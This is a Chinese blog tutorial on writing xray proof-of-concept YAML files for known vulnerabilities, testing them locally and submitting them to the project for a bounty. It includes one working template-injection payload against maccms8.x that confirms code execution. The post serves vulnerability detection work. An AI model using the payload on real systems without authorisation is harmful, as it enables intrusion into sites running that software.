找一个Nday

  1. https://www.exploit-db.com/

  2. 零组资料库

  3. CNVD

编写POC

示例:

name: poc-漏洞产品-[CVE编号]-描述[rce/weakpasswd...]
set:
  r: randomInt(800000000, 1000000000)
rules:
  - method: GET
    path: /index.php?m=vod-search&wd={if-A:printf(md5({{r}}))}{endif-A}
    follow_redirects: false
    expression: |
      response.body.bcontains(bytes(md5(string(r))))
detail:
  Affected Version: "maccms8.x"
  author: hanxiansheng26(https://github.com/hanxiansheng26)
  links:
    - https://www.cnblogs.com/test404/p/7397755.html

具体的语法可参考官方文档

https://docs.xray.cool/#/guide/poc

验证POC

./xray webscan --poc xray/pocs/poc.yml --url http://127.0.0.1/

如需要查看发包详情,可以在配置文件中设置http代理为burpsuite

upload successful

提交POC

  1. fork xray

    upload successful

  2. clone到本地(个人仓库中的xray)

    upload successful

  3. 进入xray文件夹,新建分支(可以在主分支上提交)

    ┌[bufsnakeのMacBook Pro]-(~/Web-Pentest/xray/xray-dir)-[git://master ✗]-
    └> git branch test
    ┌[bufsnakeのMacBook Pro]-(~/Web-Pentest/xray/xray-dir)-[git://master ✗]-
    └> git checkout test
    M    pocs/glassfish-cve-2017-1000028-lfi.yml
    Switched to branch 'test'
    
  4. 将编辑好的POC文件移动到pocs文件夹后提交

    ┌[bufsnakeのMacBook Pro]-(~/Web-Pentest/xray/xray-dir)-[git://test ✗]-
    └> git add .
    ┌[bufsnakeのMacBook Pro]-(~/Web-Pentest/xray/xray-dir)-[git://test ✗]-
    └> git commit -m "`date`"
    [test 63dfa7b] modify jupyter-notebook-unauthorized-access
    1 file changed, 1 insertion(+), 1 deletion(-)
    ┌[bufsnakeのMacBook Pro]-(~/Web-Pentest/xray/xray-dir)-[git://test ✔]-
    └> git push --set-upstream origin test
    
  5. 选择test分支,提交pull request

    upload successful

    填写相应的内容后点击创建

    upload successful

  6. 查看是否通过CI测试

    打√的说明已经通过CI测试
    打×的需要查看报错详情

    upload successful

    举个例子

    upload successful

    upload successful

    upload successful

  7. 根据报错内容修改poc文件,然后在提交

  8. 等待长亭的师傅审核

领取奖励

upload successful



web      xray

本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!